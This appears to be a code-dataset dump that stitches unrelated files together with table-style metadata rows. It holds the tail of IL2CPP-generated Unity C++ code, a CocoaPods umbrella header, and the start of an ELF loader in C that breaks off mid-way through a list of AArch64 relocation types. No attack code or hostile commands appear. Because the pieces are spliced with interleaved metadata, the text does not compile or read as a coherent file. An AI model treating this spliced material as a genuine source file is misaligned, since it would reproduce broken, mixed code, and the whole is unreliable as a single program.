{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_3__ctor_mB9CDB20563729AB099EA7E3162512DAA4ED765FF },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_3_Invoke_m2B54FFBD2AE2161557093314FE3001E70D7199A0 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T0_t2BF919984BA3AAA12AAAF3E9960454C42BB39A22 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T1_t71CAC2632D33DBDDEE8DA6226138D3EDF698F5D9 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T2_tCDED8A2B57D1F30D46697051883B8E26107AC0E1 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T0_tD2970B459E331AB1F26BE87351F9ED7EA5BE4495 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T1_t946247E05BF713B0B6D28C73BB95D5A26B0220B4 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T2_tEAFC8D2E09B9D0FB1F1EBFF88BA6ACD3D4BDCD37 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T3_t2C56F4E8001A03C9253A7F7E73722E18F6784426 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_InvokableCall_4_t2364CDDEAD7D89EC8A3DF50EDA200336E070465B },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_4__ctor_m925C0D7AB0E0E91F76BEE4603727F999289C8274 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_CollectionPool_2_tBED14C57FCB68DB76BF3F96F4FB125E03B25076A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_ObjectPool_1_t7C13985D550A748FA9A6B94F9C1623CE4679F470 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ObjectPool_1_Get_mA3C3EBD279EB78EE26579B86090F039A025B3AAD },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ObjectPool_1_Release_m7E889E584638CF6B9C781FE859969C7915AD730A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U3CU3Ec_t63CAD67F42EE09460E8CE67D3D4AFC06C24EC824 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_U3CU3Ec_U3C_cctorU3Eb__5_0_m0B4164FD1C7C2E4CE0BE3446510F35EFCFFB1BD7 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_Func_1_t60D3E01E44AD68BD9FFC56E26FD378C90CEF589B },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Func_1__ctor_m3AD0F60CC3D5CA04D03B558DDF5BCDBDEF489DA1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_U3CU3Ec_U3C_cctorU3Eb__5_1_mB08119F806C7F8C2A74BEDF68322D727EAE53003 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_Action_1_t80D55DE3AD8221E0F566C71FCBD9992DAC8FECA3 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Action_1__ctor_m5D4DE6984C42AAD6BA6FE2D8FBD1F839050CB78D },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ObjectPool_1__ctor_m6B07874047F865BA4688F5D820D36045341DEA93 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U3CU3Ec_t04D4865A912255024F906D17C8A195EE1593748A },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_U3CU3Ec__ctor_mB7955C548374943C37C5660785F721CA6B3BD6E4 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U3CU3Ec_t04D4865A912255024F906D17C8A195EE1593748A },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Activator_CreateInstance_TisTCollection_t5ED9CAA12108B62823E6AEA72BAD47F5185F55E1_m114906128EBF8B23F46CD524DC9A0172496A5CBB },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_TCollection_t5ED9CAA12108B62823E6AEA72BAD47F5185F55E1 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_ICollection_1_t2D304B3C7AEB2D43C3BBFFB1ADA33E7D20383732 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ICollection_1_Clear_mEDD484F7F31DF15F6304ACD4B4DEB9503AC138C4 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_Stack_1_t51874C1852076325B81B447B9A48ABB244CD6A73 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Stack_1_get_Count_mB3EA65BF31A8811A69F0232867BB97D6362705D8 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Stack_1__ctor_m1E4E9ED2B0A86163C4B137FE188A671FB5A79B56 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_Func_1_tEF5BB74FDEF368155E200E306BA1CAD0CB436B65 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Func_1_Invoke_mD557332A8DC62B9B0F100EEB545AC928457EAD47 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ObjectPool_1_get_CountAll_m4ECEC17D66AC8E10D4F781136198ED61E58DC591 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ObjectPool_1_set_CountAll_m3965F34127517FF3838F3B1A3151B87BE2A8C1F4 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Stack_1_Pop_mD78C3927C6023A194CF29F5243DC01EA5FD3C1E4 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_Action_1_t4D3400CCC7A0899CF79A7812A39237BA49676E65 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Action_1_Invoke_mD207BC1B3DA843EF8932F60D9A5F70B46DCA862E },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ObjectPool_1_get_CountInactive_m7605BEF02A49685FD3519423597769D844625260 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Stack_1_Push_m467D07D3B747D1F7388060988B44397DCD0993B2 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Stack_1_GetEnumerator_m1E6C58F8735E23F5E5C2B78B3ECB879EFCA50FC7 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Enumerator_get_Current_m993F2BF3884273797AEA8EFE9BCA9E266186A964 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Enumerator_MoveNext_m86D1FD9CE7459031F88FB0634BA9EEE67D071577 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_Enumerator_t10F321F0F249396F101395FF9754641F919E1F48 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_Enumerator_t10F321F0F249396F101395FF9754641F919E1F48_IDisposable_Dispose_m3C902735BE731EE30AC1185E7AEF6ACE7A9D9CC7 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Stack_1_Clear_m0FD190D2BCD7A22ECB30E64CD39619B52F49DF40 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ObjectPool_1_Clear_mAD5C9798EC2C21AC68D8095711D14A3CEB4C0B76 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_PlayableHandle_IsPlayableOfType_TisT_tB2B622F171CCFF9E1D294238490B4482DD90AFE2_mB5FB29158085E328CA1E561F70EA217028B29484 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t7165E1095948D7F13B5BB543F034843993B1CAC0 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t7165E1095948D7F13B5BB543F034843993B1CAC0_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tE51111571B334A78E0169C5956EC2C33ED797B1A },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tE51111571B334A78E0169C5956EC2C33ED797B1A_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t93E807654D5EFF609A60E5348D6B59F32B20B3A5 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t93E807654D5EFF609A60E5348D6B59F32B20B3A5_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tEB34E7006EB6152212FDE591D7B2020751EDB5C6 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tEB34E7006EB6152212FDE591D7B2020751EDB5C6_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tE282C7B460AE72C136264F3CF4DFCFC1A640E389 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tE282C7B460AE72C136264F3CF4DFCFC1A640E389_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tAAAE615B0ACA4BCD1176156EAE5D6214890750D5 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tAAAE615B0ACA4BCD1176156EAE5D6214890750D5_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t8725078EA0797AF50313F2AB4821AE87329609F3 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t8725078EA0797AF50313F2AB4821AE87329609F3_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t141026B03853BCF9FA2D4004C4BF60DC8FE2C0C0 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t141026B03853BCF9FA2D4004C4BF60DC8FE2C0C0_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tD72C7740D7DCFFB798E873ED64272AAB481C3797 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tD72C7740D7DCFFB798E873ED64272AAB481C3797_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tA31787C53364A0265F9F617352FA3BE38FB96DCF },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tA31787C53364A0265F9F617352FA3BE38FB96DCF_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t5230FB256B0A96F25149680A059D4FF594026951 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t5230FB256B0A96F25149680A059D4FF594026951_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t818671201FF43628189E3F10526D64851E02AA13 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t818671201FF43628189E3F10526D64851E02AA13_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t987922F52956AC366BE50722C41545D328633AA8 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t987922F52956AC366BE50722C41545D328633AA8_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t769081027EEBEEEC669DC8B24CCDA73F4928B31F },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t769081027EEBEEEC669DC8B24CCDA73F4928B31F_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t52EA3730AAD92D094A9A84BAC6B083798F132AB7 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t52EA3730AAD92D094A9A84BAC6B083798F132AB7_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tDD365FC612C5478FECAEB2DB1AF32A576478C05B },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tDD365FC612C5478FECAEB2DB1AF32A576478C05B_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t2276554A2D1E73AF09708DE0359662B352C86CBE },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t2276554A2D1E73AF09708DE0359662B352C86CBE_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t4056E3E19A5453A7BD1EF15F4A9D0B300EC26628 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t4056E3E19A5453A7BD1EF15F4A9D0B300EC26628_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_V_tB678BA6868BE9BD37334A995A213CA1420D1CD8B },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_V_tB678BA6868BE9BD37334A995A213CA1420D1CD8B_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t8C418B904271C95428E5C1F530EC494B81D2C436 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t8C418B904271C95428E5C1F530EC494B81D2C436_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tC9BC026F9F6E6BD02EBEB9DD6EC234DBFC6E4945 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tC9BC026F9F6E6BD02EBEB9DD6EC234DBFC6E4945_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t36E0279F39478D4D9F168139BA38DF37BEC7DEEF },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t36E0279F39478D4D9F168139BA38DF37BEC7DEEF_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_tC27447A30AEC8FD1B79C3801BEFE022B0439D23D },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_tC27447A30AEC8FD1B79C3801BEFE022B0439D23D_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t4CB470B96AF3E81F5C9AB8BFEE8F2F7D04D64642 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t4CB470B96AF3E81F5C9AB8BFEE8F2F7D04D64642_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_V_t59674EBA87F48F44D8D39AC1A1F19632D46E3060 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_V_t59674EBA87F48F44D8D39AC1A1F19632D46E3060_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tEEE15EC0E3D8D9FD79FF3D8B0CDD2BB3D4B3B329 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t8347C3FFBA421F6891E8C74737DD40D4CC6D19A6 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_PlayableOutputHandle_IsPlayableOutputOfType_TisT_tA92DAFD198588008D1869AF828FCFB5513BB5355_mD8B52B699BD776422906F22E1D19F68734F1A0C1 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t324DE05D29FF1D846183BBE0552DAB8493F5913B },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t324DE05D29FF1D846183BBE0552DAB8493F5913B_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t988FC5E2A13EB588F8BA85B00A4D78B4472B9BEE },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t988FC5E2A13EB588F8BA85B00A4D78B4472B9BEE_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t5114755AC4ECA0AB5E2823EC0A7B566037C32BD5 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t5114755AC4ECA0AB5E2823EC0A7B566037C32BD5_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t3764F0858F3BF8B197888C21C3759587F3AD9929 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t3764F0858F3BF8B197888C21C3759587F3AD9929_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_V_t6437DE3F400BEF06F3BB4DD29B44B6CFFE5E6AA4 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_V_t6437DE3F400BEF06F3BB4DD29B44B6CFFE5E6AA4_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t4047A919D5041AEAC606EA460DE52A8D9E80E544 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t4047A919D5041AEAC606EA460DE52A8D9E80E544_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t63875941164C08E69505FC1D4AC6BF48226BEEB6 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t63875941164C08E69505FC1D4AC6BF48226BEEB6_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t24F8421C34CAB406BB8534005838510151A338B8 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t24F8421C34CAB406BB8534005838510151A338B8_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_U_t94EB615FD87489EED8A3D6B40C5B0CCB8EEF2F92 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_U_t94EB615FD87489EED8A3D6B40C5B0CCB8EEF2F92_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t6A5B76BCE73210AEDB5EF5CB26E967C1F4071660 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_ScriptPlayable_1_t19354139C0CB837A09E5DA25D90891077DCAC041 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ScriptPlayable_1_CreateHandle_m92EA49C65996E699E1ACAFDEF63B61A96DB97E39 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_ScriptPlayable_1_t19354139C0CB837A09E5DA25D90891077DCAC041 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ScriptPlayable_1__ctor_mDDF5DD1B8457059986BA761F6AD7E962427C7275 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t53A24ED28E35FB06E2D7769265A3C845C197FA11 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ScriptPlayable_1_CreateScriptInstance_m8DE6B68678897D9FC09DC014C29985D4DF9D76AF },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ScriptPlayable_1_CloneScriptInstance_m9D7877B73E8D395BCC7800A35B36261DB3D1CA78 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t53A24ED28E35FB06E2D7769265A3C845C197FA11 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Activator_CreateInstance_TisT_t53A24ED28E35FB06E2D7769265A3C845C197FA11_m9A43F236C650FBC1F24792884692B255486D4D42 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ScriptPlayable_1_CloneScriptInstanceFromEngineObject_mB63556D6E3FFF693D87D4FC8EE3332E52948582B },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ScriptPlayable_1_CloneScriptInstanceFromIClonable_m1D8FDEA3793FC2296E21BB7F541A4E0C29FD07CD },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_PlayableHandle_GetObject_TisT_t53A24ED28E35FB06E2D7769265A3C845C197FA11_m23B1EA5AD6ED36AC6901FA7EADCF389892F3D5B9 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ScriptPlayable_1_GetHandle_m87DB88BF9112060BEE97EA60A88D5D17A07FE3B1 },
};
static TypeDefinitionIndex s_staticConstructorsToRunAtStartup[9] =
{
2280,
2450,
2451,
2452,
2453,
2454,
2455,
2456,
0,
};
IL2CPP_EXTERN_C const Il2CppCodeGenModule g_UnityEngine_CoreModule_CodeGenModule;
const Il2CppCodeGenModule g_UnityEngine_CoreModule_CodeGenModule =
{
"UnityEngine.CoreModule.dll",
2489,
s_methodPointers,
408,
s_adjustorThunks,
s_InvokerIndices,
0,
NULL,
138,
s_rgctxIndices,
369,
s_rgctxValues,
NULL,
NULL, // module initializer,
s_staticConstructorsToRunAtStartup,
NULL,
NULL,
};
| 69.48114 | 361 | 0.892388 |
136c1887547c79462c6eae536c05aeb25c58df00 | 156 | h | C | Pods/Target Support Files/Pods-StaffUITests/Pods-StaffUITests-umbrella.h | banxi1988/Staff | 7af750ed981948da0929d28b02cab9c16c883ef4 | [
"MIT"
] | null | null | null | Pods/Target Support Files/Pods-StaffUITests/Pods-StaffUITests-umbrella.h | banxi1988/Staff | 7af750ed981948da0929d28b02cab9c16c883ef4 | [
"MIT"
] | null | null | null | Pods/Target Support Files/Pods-StaffUITests/Pods-StaffUITests-umbrella.h | banxi1988/Staff | 7af750ed981948da0929d28b02cab9c16c883ef4 | [
"MIT"
] | null | null | null | #import <UIKit/UIKit.h>
FOUNDATION_EXPORT double Pods_StaffUITestsVersionNumber;
FOUNDATION_EXPORT const unsigned char Pods_StaffUITestsVersionString[];
| 22.285714 | 71 | 0.858974 |
92ce01b9cdb3aaff9203b9320e6d0f8b0bc2ec58 | 36,917 | c | C | src/pacific.c | wenhuizhang/pacific | af4ffa80d9e07a3f2bc35436e9a0edd840331b62 | [
"Apache-2.0"
] | 78 | 2019-09-16T00:45:15.000Z | 2021-12-02T09:27:30.000Z | src/pacific.c | wenhuizhang/pacific | af4ffa80d9e07a3f2bc35436e9a0edd840331b62 | [
"Apache-2.0"
] | 2 | 2019-12-04T11:47:25.000Z | 2021-05-22T13:46:39.000Z | src/pacific.c | isrc-cas/pacific | af4ffa80d9e07a3f2bc35436e9a0edd840331b62 | [
"Apache-2.0"
] | 16 | 2019-10-23T13:37:32.000Z | 2021-11-10T07:50:20.000Z | /* Please make sure you have ELF spec for reference when reading source code
* http://www.skyfree.org/linux/references/ELF_Format.pdf
*
* ELF related macros and data structures are borrowed from GNU Binutils:
* git://sourceware.org/git/binutils-gdb.git
*
*/
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
enum {
R_AARCH64_NONE = 0,
R_AARCH64_P32_ABS32 = 1,
R_AARCH64_P32_ABS16 = 2,
R_AARCH64_P32_PREL32 = 3,
R_AARCH64_P32_PREL16 = 4,
R_AARCH64_P32_MOVW_UABS_G0 = 5,
R_AARCH64_P32_MOVW_UABS_G0_NC = 6,
R_AARCH64_P32_MOVW_UABS_G1 = 7,
R_AARCH64_P32_MOVW_SABS_G0 = 8,
R_AARCH64_P32_LD_PREL_LO19 = 9,
R_AARCH64_P32_ADR_PREL_LO21 = 10,
R_AARCH64_P32_ADR_PREL_PG_HI21 = 11,
R_AARCH64_P32_ADD_ABS_LO12_NC = 12,
R_AARCH64_P32_LDST8_ABS_LO12_NC = 13,
R_AARCH64_P32_LDST16_ABS_LO12_NC = 14,
R_AARCH64_P32_LDST32_ABS_LO12_NC = 15,
R_AARCH64_P32_LDST64_ABS_LO12_NC = 16,
R_AARCH64_P32_LDST128_ABS_LO12_NC = 17,
R_AARCH64_P32_TSTBR14 = 18,
R_AARCH64_P32_CONDBR19 = 19,
R_AARCH64_P32_JUMP26 = 20,
R_AARCH64_P32_CALL26 = 21,
R_AARCH64_P32_MOVW_PREL_G0 = 22,
R_AARCH64_P32_MOVW_PREL_G0_NC = 23,
R_AARCH64_P32_MOVW_PREL_G1 = 24,
R_AARCH64_P32_GOT_LD_PREL19 = 25,
R_AARCH64_P32_ADR_GOT_PAGE = 26,
R_AARCH64_P32_LD32_GOT_LO12_NC = 27,
R_AARCH64_P32_LD32_GOTPAGE_LO14 = 28,
R_AARCH64_P32_TLSGD_ADR_PREL21 = 80,
R_AARCH64_P32_TLSGD_ADR_PAGE21 = 81,
R_AARCH64_P32_TLSGD_ADD_LO12_NC = 82,
R_AARCH64_P32_TLSLD_ADR_PREL21 = 83,
R_AARCH64_P32_TLSLD_ADR_PAGE21 = 84,
R_AARCH64_P32_TLSLD_ADD_LO12_NC = 85,
R_AARCH64_P32_TLSLD_MOVW_DTPREL_G1 = 87,
R_AARCH64_P32_TLSLD_MOVW_DTPREL_G0 = 88,
R_AARCH64_P32_TLSLD_MOVW_DTPREL_G0_NC = 89,
R_AARCH64_P32_TLSLD_ADD_DTPREL_HI12 = 90,
R_AARCH64_P32_TLSLD_ADD_DTPREL_LO12 = 91,
R_AARCH64_P32_TLSLD_ADD_DTPREL_LO12_NC = 92,
R_AARCH64_P32_TLSIE_ADR_GOTTPREL_PAGE21 = 103,
R_AARCH64_P32_TLSIE_LD32_GOTTPREL_LO12_NC = 104,
R_AARCH64_P32_TLSIE_LD_GOTTPREL_PREL19 = 105,
R_AARCH64_P32_TLSLE_MOVW_TPREL_G1 = 106,
R_AARCH64_P32_TLSLE_MOVW_TPREL_G0 = 107,
R_AARCH64_P32_TLSLE_MOVW_TPREL_G0_NC = 108,
R_AARCH64_P32_TLSLE_ADD_TPREL_HI12 = 109,
R_AARCH64_P32_TLSLE_ADD_TPREL_LO12 = 110,
R_AARCH64_P32_TLSLE_ADD_TPREL_LO12_NC = 111,
R_AARCH64_P32_TLSLE_LDST8_TPREL_LO12 = 112,
R_AARCH64_P32_TLSLE_LDST8_TPREL_LO12_NC = 113,
R_AARCH64_P32_TLSLE_LDST16_TPREL_LO12 = 114,
R_AARCH64_P32_TLSLE_LDST16_TPREL_LO12_NC = 115,
R_AARCH64_P32_TLSLE_LDST32_TPREL_LO12 = 116,
R_AARCH64_P32_TLSLE_LDST32_TPREL_LO12_NC = 117,
R_AARCH64_P32_TLSLE_LDST64_TPREL_LO12 = 118,
R_AARCH64_P32_TLSLE_LDST64_TPREL_LO12_NC = 119,
R_AARCH64_P32_TLSDESC_LD_PREL19 = 122,
R_AARCH64_P32_TLSDESC_ADR_PREL21 = 123,
R_AARCH64_P32_TLSDESC_ADR_PAGE21 = 124,
R_AARCH64_P32_TLSDESC_LD32_LO12_NC = 125,
R_AARCH64_P32_TLSDESC_ADD_LO12_NC = 126,
R_AARCH64_P32_TLSDESC_CALL = 127,
R_AARCH64_P32_COPY = 180,
R_AARCH64_P32_GLOB_DAT = 181,
R_AARCH64_P32_JUMP_SLOT = 182,
R_AARCH64_P32_RELATIVE = 183,
R_AARCH64_P32_TLS_DTPMOD = 184,
R_AARCH64_P32_TLS_DTPREL = 185,
R_AARCH64_P32_TLS_TPREL = 186,
R_AARCH64_P32_TLSDESC = 187,
R_AARCH64_P32_IRELATIVE = 188,
R_AARCH64_NULL = 256,
R_AARCH64_ABS64 = 257,
R_AARCH64_ABS32 = 258,
R_AARCH64_ABS16 = 259,
R_AARCH64_PREL64 = 260,
R_AARCH64_PREL32 = 261,
R_AARCH64_PREL16 = 262,
R_AARCH64_MOVW_UABS_G0 = 263,
R_AARCH64_MOVW_UABS_G0_NC = 264,
R_AARCH64_MOVW_UABS_G1 = 265,
R_AARCH64_MOVW_UABS_G1_NC = 266,
R_AARCH64_MOVW_UABS_G2 = 267,
R_AARCH64_MOVW_UABS_G2_NC = 268,
R_AARCH64_MOVW_UABS_G3 = 269,
R_AARCH64_MOVW_SABS_G0 = 270,
R_AARCH64_MOVW_SABS_G1 = 271,
R_AARCH64_MOVW_SABS_G2 = 272,
R_AARCH64_LD_PREL_LO19 = 273,
R_AARCH64_ADR_PREL_LO21 = 274,
R_AARCH64_ADR_PREL_PG_HI21 = 275,
R_AARCH64_ADR_PREL_PG_HI21_NC = 276,
R_AARCH64_ADD_ABS_LO12_NC = 277,
R_AARCH64_LDST8_ABS_LO12_NC = 278,
R_AARCH64_TSTBR14 = 279,
R_AARCH64_CONDBR19 = 280,
